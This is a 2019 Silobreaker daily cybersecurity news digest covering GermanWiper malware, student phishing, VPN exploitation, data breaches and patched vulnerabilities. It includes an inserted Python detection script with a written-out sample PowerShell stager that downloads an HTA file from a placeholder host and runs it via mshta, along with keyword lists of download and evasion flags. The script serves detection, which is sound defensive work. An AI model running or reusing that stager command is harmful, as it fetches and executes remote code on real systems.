Silobreaker Daily Cyber Digest – 06 September 2019
Researchers publish analysis of GermanWiper malware
- GermanWiper malware is distributed via a spam email campaign in Germany. The attacker sends spear phishing emails pretending to be a job application, with a compressed file attachment said to contain a PDF file of the applicant’s resume. Instead, the file is a LNK shortcut file that executes a PowerShell command, which downloads and executes an HTA file, which in turn downloads the GermanWiper payload.
- The malware poses as ransomware; in reality it is a data-wiping malware that destroys data instead of encrypting it.
- A full technical analysis is available on Carbon Black’s website.
Source (Includes IOCs)
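As an added illustration of how the delivery chain above can be spotted in endpoint telemetry (this is not code from Silobreaker's digest or from Carbon Black's analysis), the Python below applies per-event rules and a parent/child correlation to Sysmon Event ID 1 style process-creation records. All events, file names and the host example.invalid are constructed samples; mshta.exe as the HTA host, the field names and the download/evasion keyword lists are assumptions.

```python
"""Detect the LNK -> PowerShell -> HTA delivery chain in process-creation
telemetry. Every event below is a constructed sample, not real telemetry;
example.invalid is a reserved placeholder host."""
import ntpath
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcessEvent:
    pid: int
    ppid: int
    image: str         # full path of the created process
    parent_image: str  # full path of the parent process
    cmdline: str       # full command line


POWERSHELL = {"powershell.exe", "pwsh.exe"}
# Processes that launch a double-clicked shortcut: the shell or an archive viewer.
SHELL_HOSTS = {"explorer.exe", "winrar.exe", "7zfm.exe"}
# Download primitives commonly seen in one-line PowerShell stagers (assumed list).
DOWNLOAD = re.compile(
    r"DownloadFile|DownloadString|Invoke-WebRequest|\biwr\b|Start-BitsTransfer|Net\.WebClient",
    re.IGNORECASE,
)
HTA_REF = re.compile(r"\.hta\b|\bmshta(\.exe)?\b", re.IGNORECASE)
# Flags that hide the console window or skip profile/execution policy (assumed list).
EVASION_FLAGS = re.compile(
    r"-(w(indowstyle)?\s+hidden|nop(rofile)?|ep\s+bypass|enc(odedcommand)?)", re.IGNORECASE
)


def base(path: str) -> str:
    """Lower-cased file name of a Windows path; ntpath works on any platform."""
    return ntpath.basename(path).lower()


def detect(events):
    """Per-event rules; returns (rule_name, pid) pairs in event order."""
    alerts = []
    for e in events:
        img, parent = base(e.image), base(e.parent_image)
        if img in POWERSHELL and DOWNLOAD.search(e.cmdline) and HTA_REF.search(e.cmdline):
            alerts.append(("powershell_downloads_hta", e.pid))
        if (img in POWERSHELL and parent in SHELL_HOSTS
                and EVASION_FLAGS.search(e.cmdline) and DOWNLOAD.search(e.cmdline)):
            alerts.append(("hidden_powershell_stager_from_shell", e.pid))
        if img == "mshta.exe" and parent in POWERSHELL:
            alerts.append(("mshta_spawned_by_powershell", e.pid))
    return alerts


def find_delivery_chains(events):
    """Correlate the full shell -> PowerShell(download) -> mshta chain over ppid links.
    Returns (shell_pid, powershell_pid, mshta_pid) triples."""
    by_pid = {e.pid: e for e in events}
    chains = []
    for e in events:
        if base(e.image) != "mshta.exe":
            continue
        ps = by_pid.get(e.ppid)
        if not ps or base(ps.image) not in POWERSHELL or not DOWNLOAD.search(ps.cmdline):
            continue
        host = by_pid.get(ps.ppid)
        if host and base(host.image) in SHELL_HOSTS:
            chains.append((host.pid, ps.pid, e.pid))
    return chains


PS_PATH = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
# Constructed stager: hidden window, fetch an .hta, hand it to mshta.exe.
STAGER_CMDLINE = (
    'powershell.exe -NoP -w hidden -c "(New-Object Net.WebClient).DownloadFile('
    "'http://example.invalid/resume.hta', 'C:\\Users\\Public\\resume.hta'); "
    "Start-Process mshta.exe 'C:\\Users\\Public\\resume.hta'\""
)
SAMPLE_EVENTS = [  # constructed telemetry
    ProcessEvent(100, 1, r"C:\Windows\explorer.exe", r"C:\Windows\System32\userinit.exe", "explorer.exe"),
    ProcessEvent(200, 100, PS_PATH, r"C:\Windows\explorer.exe", STAGER_CMDLINE),
    ProcessEvent(300, 200, r"C:\Windows\System32\mshta.exe", PS_PATH, r"mshta.exe C:\Users\Public\resume.hta"),
    # Benign: an admin script run from the shell, no download, no evasion flags.
    ProcessEvent(400, 100, PS_PATH, r"C:\Windows\explorer.exe", r"powershell.exe -File C:\Scripts\backup.ps1"),
    # Benign: a vendor installer HTA launched directly from the shell.
    ProcessEvent(500, 100, r"C:\Windows\System32\mshta.exe", r"C:\Windows\explorer.exe",
                 r"mshta.exe C:\Program Files\Vendor\setup.hta"),
]

if __name__ == "__main__":
    for rule, pid in detect(SAMPLE_EVENTS):
        print(f"ALERT {rule} pid={pid}")
    print("chains:", find_delivery_chains(SAMPLE_EVENTS))
```

The per-event rules fire on the stager (pid 200) and on mshta.exe spawned by PowerShell (pid 300), while the two benign events produce nothing; the correlation function ties the three processes together so an analyst sees one chain rather than three isolated hits.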
Cloned university websites target students ahead of academic year
- Researchers at Proofpoint identified a spike in phishing attacks directed against students. The campaigns are typically of medium volume, sending out tens of thousands of messages containing HTML attachments to students every day.
- Targets who access the malicious attachment are redirected to fake library or student management portal sites. The spoofed websites contain fake branding and other social engineering tactics.
- The researchers also warned that the Silent Librarian group continue to pose a threat to students. Indicted by the FBI, the group carry out phishing attacks that impersonate university library administration, using stolen credentials to steal and resell intellectual property such as journal subscription accounts.
Spam campaign uses compromised devices to forward malicious PHP scripts
- Researchers at Trend Micro identified a spam campaign targeting UK-based users with a cryptocurrency scam. The campaign begins by gaining SSH access to devices via brute force attacks. Following the compromise, an attacker sends a base64-encoded PHP script to web servers, which then delivers an email with a link to a scam site to a specific recipient.
- Users who click on the link are sent to sites which spoof legitimate news outlets. The campaign is targeted against users who may be looking for jobs or extra income. A victim who clicks on any link on the malicious page will be redirected to a cryptocurrency scam site where they will be asked to pay $250 as ‘seed money’.
- The researchers stated that the probable use of a PHP web shell and functions would allow attackers to access servers again regardless of whether a patch was applied. Trend Micro also stated that the attackers could use the spam botnet’s routine to spread malware to more systems and vulnerable servers.
APT5 target vulnerabilities in Fortinet and Pulse Secure VPN servers
- ZDNet reported that Chinese state-sponsored group APT5 have been engaged in attacks against Fortinet and Pulse Secure VPN servers. The vulnerabilities, tracked as CVE-2018-13379 and CVE-2019-11510, were revealed last month. Both vulnerabilities allow an attacker to retrieve files which store information such as passwords or VPN session data from affected products.
- An umbrella group of APT5 has established infrastructure to scan for exposed VPN servers as of August 2019. The group were among the first to begin scanning for, and attempting to exploit, the vulnerabilities.
- ZDNet’s source observed APT5’s attacks but stated that they were not in a position to determine if the attacks were successful.
Chinese state-sponsored group APT3 steal and repurpose NSA cyber tool
- Researchers at Check Point discovered that artefacts of the EternalRomance tool, used by NSA cyber unit Equation Group, were captured by Chinese group APT3. The Chinese group went on to adapt EternalRomance to create the Bemstour tool.
- The researchers stated that it was likely that APT3 captured the artefacts when the tool was used against their own computers. Check Point researcher Mark Lechtik speculated that the Chinese had deliberately baited the NSA to gain access to the tool.
Leaks and Breaches
CircleCI suffers data breach through third party vendor
- On September 4th, 2019, CircleCI released a statement revealing that customer data had been exposed through a third-party analytics vendor. The company stated that they became aware of the attack on August 31st, 2019.
- CircleCI revealed that they believe that affected customers accessed the platform between June 30th, 2019 and August 31st, 2019. Exposed data includes usernames, email addresses associated with Bitbucket and GitHub, IP addresses, and more. Information that was potentially exposed includes repository URLs and names, branch names, repository owners, and organization names.
Personal data of Monster users exposed on web server
- An exposed web server containing resumes and CVs of job applicants was found online. The server reportedly belonged to a recruitment customer Monster Worldwide had previously worked with, and some of the exposed data includes that of Monster users. Thousands of resumes were found in a folder dated May 2017; however, the exact number of exposed files remains unclear.
- The exposed data was mostly from users located in the US and dates from 2014 to 2017. Exposed private data included phone numbers, home addresses, and email addresses, and in some cases immigration documentation for work. According to TechCrunch, the data is no longer accessible via the web server, however, some can still be found in cached results.
- Monster notified the owner of the server after being informed of the leak by a security researcher. According to Monster, the recruitment customer company is responsible for informing affected users, as Monster is ‘not in a position’ to identify affected users.
Private data of 13,905 Artesia General Hospital patients potentially exposed in data breach
- The data breach at Artesia General Hospital in New Mexico was discovered on June 18th, 2019 and was the result of a phishing attack on an employee email account.
- Potentially exposed data includes patient names, dates of birth, patient account numbers, medical record numbers, health insurance information, and more. In some cases, Social Security numbers may also have been exposed. To date, no evidence of data theft has been found.
DK-LOK internal and external emails exposed in database leak
- Researchers at vpnMentor identified an unprotected and unencrypted Elasticsearch database in the email platform used by industrial pipe, valve, and fitting manufacturer DK-LOK. The breach reveals information from various DK-LOK branches and also the information of numerous international clients.
- Exposed information included product prices, project bids, private conversations, and discussions on suppliers, clients, internal operations and projects. The breach also exposed employee and client details such as names, email addresses, personal conversations, and more.
- vpnMentor made several attempts to alert the company, but these have been ignored. Because the database continues to leak, the researchers can see that the company have received the emails.
Multiple security flaws found in child GPS trackers
- Security researchers at Avast identified vulnerabilities in 29 GPS trackers produced by the Chinese manufacturer Shenzhen i365 Tech. The researchers analyzed a T8 Mini Child Tracker which allows for GPS tracking and two-way communication capabilities.
- Users are asked to log in to an HTTP form with a default password ‘123456’ and a user ID which is based on the GPS tracker’s International Mobile Equipment Identity (IMEI) code. An attacker can easily scan through IMEI numbers and enter the default password to gain access to the tracker. The researchers identified at least 600,000 devices that are live in the wild with default passwords.
- Successful attackers could lock the device, acquire the user’s phone number, spy on users and spoof the device’s location.
WordPress 5.2.3 release patches vulnerabilities
- On September 5th, 2019, WordPress 5.2.3 was released; the new version fixes six vulnerabilities and twenty-nine bugs or enhancements.
- Five of the flaws are XSS vulnerabilities and one is an open redirect vulnerability. All vulnerabilities were discovered by third party researchers. A full list of changes and security fixes is available via WordPress.
Critical security vulnerability fixed in Mozilla Firefox 69
- The critical vulnerability discovered by iDefense Labs and tracked as CVE-2019-11751 can cause malicious code execution through command line parameters. The issue is caused by a failure to properly sanitize logging-related command line parameters when Firefox is launched by another program. The issue only affects instances of Firefox running on Windows operating systems.
Three vulnerabilities found in Espressif chips
- The three vulnerabilities affect the Espressif ESP32 and ESP8266 chips. Two of the vulnerabilities, tracked as CVE-2019-12588 and CVE-2019-12586, allow attackers to cause a denial of service that could crash devices within radio range. CVE-2019-12588 only affects ESP8266 Wi-Fi devices.
- The other flaw, tracked as CVE-2019-12587, is found in the SDKs of the devices and could allow an attacker to install a zero Pairwise Master Key (PMK), which in turn allows an attacker in radio range to replay, decrypt or spoof frames via a rogue access point, enabling them to steal session keys, usernames and passwords.
- As the PMK is initialized as zero when an ESP device starts, an attacker could exploit CVE-2019-12588 and CVE-2019-12586 in combination with the third flaw to increase damage. Espressif has released patches for all vulnerabilities.
Cybercriminals adopt malware name given by researchers
- In July 2019 CrowdStrike researchers reported on a new variant of BitPaymer ransomware which they dubbed DoppelPaymer malware. The researchers suggested that DoppelPaymer was created by a member of INDRIK SPIDER, who originally created BitPaymer.
- Following CrowdStrike’s report, the developers behind DoppelPaymer adopted the name and now display it on their Tor payment site.
Hong Kong Stock Exchange website hit by DDoS attack
- The website was hit by a distributed denial-of-service attack while Hong Kong Exchanges and Clearing Limited (HKEX) was halting derivatives transactions to fix an unrelated vulnerability in its vendor-supplied trading platform.
- The DDoS attack disrupted the website’s ability to display exchange prices and financial data, whilst the software flaw affected derivative financial products. An older version not containing the vulnerability is now used on the HKEX’s website instead and normal service has resumed.
NSA Cybersecurity Directorate to focus on ransomware
- According to Anne Neuberger, director of the newly established US National Security Agency (NSA) Cybersecurity Directorate, there are about 4,000 ransomware attacks on a daily basis, which is why ransomware will be the focus for the directorate. Other threats the directorate will be focusing on are ones from nation-state actors, such as election influencing or information theft.
Belarusian authorities shut down hacking forum
- The Belarusian Ministry of Internal Affairs announced that the Belarusian police shut down Russian-speaking hacker forum XakFor. The forum was hosted in Belarus, launched in 2012, had 28,000 registered accounts and operated on the open web.
- XakFor was primarily populated by low-skilled hackers and provided access to malware which could be purchased or downloaded for free.
The Silobreaker Team
Disclaimer: Although Silobreaker has relied on what it regards as reliable sources while compiling the content herein, Silobreaker cannot guarantee the accuracy, completeness, integrity or quality of such content and no responsibility is accepted by Silobreaker in respect of such content. Readers must determine for themselves what reliance they should place on the compiled content herein.